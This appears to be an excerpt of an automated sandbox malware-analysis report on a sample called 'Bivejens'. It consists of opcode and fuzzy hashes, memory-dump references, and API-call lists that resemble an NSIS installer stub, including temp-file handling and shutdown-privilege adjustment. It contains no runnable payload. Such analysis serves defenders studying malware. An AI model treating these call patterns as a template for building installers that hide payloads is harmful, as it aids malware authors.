                                                                                                                          • Opcode ID: 9e9f7d1e6871d6f819d5bb0568aa34ee608f71775d94082b45b3c20f15e2ba27
                                                                                                                          • Instruction ID: b6c7c1f865940ddaa6a59de9cef61d61a0134162798ab32b5edf542cfe8bd94a
                                                                                                                          • Opcode Fuzzy Hash: 9e9f7d1e6871d6f819d5bb0568aa34ee608f71775d94082b45b3c20f15e2ba27
                                                                                                                          • Instruction Fuzzy Hash: 5B216070E0124CDFCB05CFA5D990AEDBFB6AF49305F248099E859A6290DB31DD85DF60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b057b2f9252e0409f151ef7833d32ce76f7dd78631a3f0d00b501a618a687127
                                                                                                                          • Instruction ID: 65972782a1d8542b4d629124cb9192397f870cf01b9aa56fda2f5f416ca85192
                                                                                                                          • Opcode Fuzzy Hash: b057b2f9252e0409f151ef7833d32ce76f7dd78631a3f0d00b501a618a687127
                                                                                                                          • Instruction Fuzzy Hash: 2A118E35704611DFC7195B2AC89892EB7A6FF897623594468E81ACF760CF21DC468BD0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2d4c1826b9f6caaa8f5d59f4e1d7f1436c98a1ac9655236601023d92ad2d9d1c
                                                                                                                          • Instruction ID: 2dc7c1a9d9508451480ac5dcc12b9c108317dcb14c6d668df8707e10e281a4d0
                                                                                                                          • Opcode Fuzzy Hash: 2d4c1826b9f6caaa8f5d59f4e1d7f1436c98a1ac9655236601023d92ad2d9d1c
                                                                                                                          • Instruction Fuzzy Hash: FB115170D00209DFEB04EFA5C58179EBBF5FB85300F10C5A9C4989B261EB755A459F91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d685124b043f728efd666f46adbae8414fe84be4d6a699ba8f5db77b92f7955f
                                                                                                                          • Instruction ID: f501f3765658e533696eda158e83424e86a1a5f1a97dd06e029350d878a0dc37
                                                                                                                          • Opcode Fuzzy Hash: d685124b043f728efd666f46adbae8414fe84be4d6a699ba8f5db77b92f7955f
                                                                                                                          • Instruction Fuzzy Hash: 3F21AF74D05209CFCB40EFA9D9445EEBBF4FF4A301F1051AAD859B7220EB305A99CBA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 66f42becaeef8f27a4dd86cee45dcbc41d811fd89bbbc654bcd5de9601883f3e
                                                                                                                          • Instruction ID: 962aaef4604d12c21efcad93bccc7430c75b931bc433b71e62a984bfde7f8593
                                                                                                                          • Opcode Fuzzy Hash: 66f42becaeef8f27a4dd86cee45dcbc41d811fd89bbbc654bcd5de9601883f3e
                                                                                                                          • Instruction Fuzzy Hash: BB01F732704114AFCB059E589C51BAE3BABDFC8750F148029FD29DB284DF318E169B90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fe656285ce69aace8777832c89ee44ca0c26bb90a921cbc7f68064e82ea364f4
                                                                                                                          • Instruction ID: 681622156c69e51cfbcc1a7cd4397fc492875697e663f8980d28eb203747d022
                                                                                                                          • Opcode Fuzzy Hash: fe656285ce69aace8777832c89ee44ca0c26bb90a921cbc7f68064e82ea364f4
                                                                                                                          • Instruction Fuzzy Hash: 1C01A27AB001109FC740DB7CE844DD97BFEEF89262B2041A5E989D7361DB22DD158B91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d8681d278ccb53d45aacb18c3ff11637878f99328622e21820074b547c2f4448
                                                                                                                          • Instruction ID: 094b6a7d9754d0af5a125196b91085a2b7ad6b8054f0cfe036769306775b6191
                                                                                                                          • Opcode Fuzzy Hash: d8681d278ccb53d45aacb18c3ff11637878f99328622e21820074b547c2f4448
                                                                                                                          • Instruction Fuzzy Hash: 60F04436300214AFDF085BA59854A7EBBABEFDC3A1B144429BD4AC7351EF61CC4587A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c55ab6bb2b7d6a021d5ebc890d9d2de189e56d70e3a3c98eb0483048feff24a7
                                                                                                                          • Instruction ID: 5c5f4276bd378c35c341ac0c45a07646c1a0116b2cdf2fc6aad80aa790b81f3f
                                                                                                                          • Opcode Fuzzy Hash: c55ab6bb2b7d6a021d5ebc890d9d2de189e56d70e3a3c98eb0483048feff24a7
                                                                                                                          • Instruction Fuzzy Hash: 5BF062357001108FD7049F69D855D5A77ADFFC576972044AAF91DCF2A1DB21DC068790
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6d0598afc9b7be264ca7c4d02d221de3860554bcdc1c885ff36b5b36d1676b2c
                                                                                                                          • Instruction ID: 85512994c2dd80922a8661af6271e5e639eba7977d541ed7f2677cb298b593e6
                                                                                                                          • Opcode Fuzzy Hash: 6d0598afc9b7be264ca7c4d02d221de3860554bcdc1c885ff36b5b36d1676b2c
                                                                                                                          • Instruction Fuzzy Hash: 5F014874E04209DFDB00CFA8D8849EEBBF1FB89311F0081AAD850A3350D7795A2ADF91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: bb4ef59662b2e2f4ae9b01f151c823e4bde6bceb4c09c427ff1354cad201a53e
                                                                                                                          • Instruction ID: 77fd6bf6344bb2c1c6b379216d9a3d873d8fdd1237f62a51dbd149cdb8e33a24
                                                                                                                          • Opcode Fuzzy Hash: bb4ef59662b2e2f4ae9b01f151c823e4bde6bceb4c09c427ff1354cad201a53e
                                                                                                                          • Instruction Fuzzy Hash: 41011D70E00219CFDF44EFB9C945ADEBBF9BF48201F10817AD559E7250E73959058BA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5c3f2743411ea7bb49aa19ec968bda6b11d7fc46f1e12cd200b1620598482908
                                                                                                                          • Instruction ID: 3b2e822d7c71d216261248df0cd7ddb5ef3eb08496bbb78248bf278b4e1860fe
                                                                                                                          • Opcode Fuzzy Hash: 5c3f2743411ea7bb49aa19ec968bda6b11d7fc46f1e12cd200b1620598482908
                                                                                                                          • Instruction Fuzzy Hash: E7F01C353401148FD7089F2AD868E2A37EEFFC975571584A9F90ACB7A1DE61DC01C790
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e2bc76763bfbd4c2637622e2239d4362e1e3c4c0d314d6fae8869b82641db947
                                                                                                                          • Instruction ID: a1d37d00a78ac7f0e3b930a3d59c20605f2915acd5d4fe0845fb590617e80a66
                                                                                                                          • Opcode Fuzzy Hash: e2bc76763bfbd4c2637622e2239d4362e1e3c4c0d314d6fae8869b82641db947
                                                                                                                          • Instruction Fuzzy Hash: 81F06531380110CF9715AA2DE45462D779EEF84B56395416AE915CF370DF21CC4B8781
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8d2c57d2a094a2cdb99a6b05ca012d009164b0ee06ac49131f7945a05a64fc75
                                                                                                                          • Instruction ID: b4c8827f2dc89a97a51db17459fd462dc882cb242f67bfc11f196a67df8d106b
                                                                                                                          • Opcode Fuzzy Hash: 8d2c57d2a094a2cdb99a6b05ca012d009164b0ee06ac49131f7945a05a64fc75
                                                                                                                          • Instruction Fuzzy Hash: 54F08236A04118DFCB10DF69D844AEEBBF5EFD8321F11C02AE918C7254D33149599B91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 539d7ba94bffce3f43645ed0bde90801717e37f6c4e3268b3240d8f4097af7bb
                                                                                                                          • Instruction ID: 7737d26ac470cc67461cbd7336129596e37d3db8e713d90c2fd2fe2f5b1c531b
                                                                                                                          • Opcode Fuzzy Hash: 539d7ba94bffce3f43645ed0bde90801717e37f6c4e3268b3240d8f4097af7bb
                                                                                                                          • Instruction Fuzzy Hash: 9EE0A57A640104AFCB108A84DC41F9DBBB2BB88711F244156EA15AB2A0C731A8219B60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b2870c6d39c9717c5de68ba43246e84160357cafd85cb56711d514ade8cb0a5a
                                                                                                                          • Instruction ID: 7575c555999c5751dd42c298764ec0471084e92922679b7c8193e70e1e0ea7b7
                                                                                                                          • Opcode Fuzzy Hash: b2870c6d39c9717c5de68ba43246e84160357cafd85cb56711d514ade8cb0a5a
                                                                                                                          • Instruction Fuzzy Hash: B8D01231D6022A978B01AAA5DC044DEBB39FE95721B914666D51437140EB70265986E1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cc355369fffdb3951f37f9b4b6eda259ae96798e3b0507428ba04ba1bac0478b
                                                                                                                          • Instruction ID: 4e975730a44259d31047bb79c26c3223e38139724948940eb1399c660c81554e
                                                                                                                          • Opcode Fuzzy Hash: cc355369fffdb3951f37f9b4b6eda259ae96798e3b0507428ba04ba1bac0478b
                                                                                                                          • Instruction Fuzzy Hash: 33D0C231D6022ACA8B01EBA49C100EDBB35BE84321B948212C03432150EB30165D86A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1319fb932cc5d69343d3e06e880aa634f8a5e4a880afd006d52efa3525b239a3
                                                                                                                          • Instruction ID: 0da4d4dee91fa23e5b2e766cca1c916d39aefc3818630d7d9a69abb094038dbb
                                                                                                                          • Opcode Fuzzy Hash: 1319fb932cc5d69343d3e06e880aa634f8a5e4a880afd006d52efa3525b239a3
                                                                                                                          • Instruction Fuzzy Hash: 26D05E740143144BCB02A771E8C5689372AAB81114B908698E08A0B96ADEF619864F11
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b741edf2626dd6887c67e769ac4f69715890518f7891a81369d86cdbeb971458
                                                                                                                          • Instruction ID: 26e94226c07c1ad7437e2819ba3e6997675790a9bde76a278802965f4ca68443
                                                                                                                          • Opcode Fuzzy Hash: b741edf2626dd6887c67e769ac4f69715890518f7891a81369d86cdbeb971458
                                                                                                                          • Instruction Fuzzy Hash: 05D0673AB000089FCB149F98EC809DDF776FB98221B148116E915A3260C7319965DB60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 19851f2314dbcf940d409c24b744c7569775b06c9de07c2541ccf99959289a2f
                                                                                                                          • Instruction ID: a0ed61ecf794df9dcdd66c1e629e64b16c7c8e74347f1414d6b3cf5ad2c8a28d
                                                                                                                          • Opcode Fuzzy Hash: 19851f2314dbcf940d409c24b744c7569775b06c9de07c2541ccf99959289a2f
                                                                                                                          • Instruction Fuzzy Hash: 7BC012700143184BD601F761DD85755332E6B805107D0C554E08E0696ADFF62DD54FA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fd4f2807d0e34e2c859b63a8296621a0649c6c558d8782a4fd1d927bfa69a2cf
                                                                                                                          • Instruction ID: 0e5ca33387c2f02d44b6c03187b355d1ea84ac9c51351306799cdbf851b96b5d
                                                                                                                          • Opcode Fuzzy Hash: fd4f2807d0e34e2c859b63a8296621a0649c6c558d8782a4fd1d927bfa69a2cf
                                                                                                                          • Instruction Fuzzy Hash: B1B09230045202CBCE58DB24A9CDA4C7F78EB8020936102A8C40B8E821CB2160C78E12
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNEL32 ref: 0040337C
                                                                                                                          • GetVersion.KERNEL32 ref: 00403382
                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                                                                                          • #17.COMCTL32(?,?,?,?), ref: 004033F2
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004033F9
                                                                                                                          • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                                                                                          • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,?,?,?), ref: 0040342A
                                                                                                                          • CharNextW.USER32(00000000,00435000,?,00435000,00000000,?,?,?,?), ref: 00403462
                                                                                                                            • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,?,?,004033CB,?), ref: 00406670
                                                                                                                            • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                          • GetTempPathW.KERNEL32(00000400,00437800,?,?,?,?), ref: 0040359C
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,?,?,?), ref: 004035AD
                                                                                                                          • lstrcatW.KERNEL32(00437800,\Temp,?,?,?,?), ref: 004035B9
                                                                                                                          • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,?,?,?), ref: 004035CD
                                                                                                                          • lstrcatW.KERNEL32(00437800,Low,?,?,?,?), ref: 004035D5
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,?,?,?), ref: 004035E6
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,?,?,?), ref: 004035EE
                                                                                                                          • DeleteFileW.KERNEL32(00437000,?,?,?,?), ref: 00403602
                                                                                                                            • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,?,?,?), ref: 00406291
                                                                                                                          • OleUninitialize.OLE32(?,?,?,?,?), ref: 004036CD
                                                                                                                          • ExitProcess.KERNEL32 ref: 004036EE
                                                                                                                          • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,?,?,?,?,?), ref: 00403701
                                                                                                                          • lstrcatW.KERNEL32(00437800,0040A26C,00437800,~nsu,00435000,00000000,?,?,?,?,?), ref: 00403710
                                                                                                                          • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,?,?,?,?,?), ref: 0040371B
                                                                                                                          • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,?,?,?,?,?), ref: 00403727
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,?,?,?), ref: 00403743
                                                                                                                          • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,?,?,?,?,?), ref: 0040379D
                                                                                                                          • CopyFileW.KERNEL32(00438800,00420EA8,?,?,?,?,?), ref: 004037B1
                                                                                                                          • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,?,?,?), ref: 004037DE
                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?), ref: 0040380D
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                                                                          • ExitWindowsEx.USER32(?,80040002), ref: 00403871
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403894
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                          • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                          • API String ID: 3441113951-3195845224
                                                                                                                          • Opcode ID: 9120bc7a57e974a7d2d76e8b13b81fd73d356f704ea9d9fe3a84bd0e3f5ba064
                                                                                                                          • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                                                                          • Opcode Fuzzy Hash: 9120bc7a57e974a7d2d76e8b13b81fd73d356f704ea9d9fe3a84bd0e3f5ba064
                                                                                                                          • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404CD5
                                                                                                                          • LoadBitmapW.USER32(?), ref: 00404CE8
                                                                                                                          • SetWindowLongW.USER32(?,?,00405260), ref: 00404D01
                                                                                                                          • ImageList_Create.COMCTL32(?,?,?,?,00000000), ref: 00404D15
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                                                                          • SendMessageW.USER32(?,00001109,?), ref: 00404D3D
                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404D5B
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                                                                          • SendMessageW.USER32(?,0000110A,?,00000000), ref: 00404E56
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                                                                          • GetWindowLongW.USER32(?,?), ref: 00404E99
                                                                                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 00404EA7
                                                                                                                          • ShowWindow.USER32(?,?), ref: 00404EB8
                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,?), ref: 00405053
                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00405098
                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                                                                          • InvalidateRect.USER32(?,00000000,?), ref: 004051E9
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405249
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N
                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                          • Opcode ID: d0ab387dba1094753cc2861ad9fb0d9ca09aa5e33736c44ba4ea0e36dbbc038f
                                                                                                                          • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                                                                                          • Opcode Fuzzy Hash: d0ab387dba1094753cc2861ad9fb0d9ca09aa5e33736c44ba4ea0e36dbbc038f
                                                                                                                          • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(00437800,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,00437800,?,774D3420,004059B6,?,00437800,774D3420), ref: 004065D2
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID: 8gB
                                                                                                                          • API String ID: 2295610775-1733800166
                                                                                                                          • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                                          • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                                                                          • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                                          • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: .5q
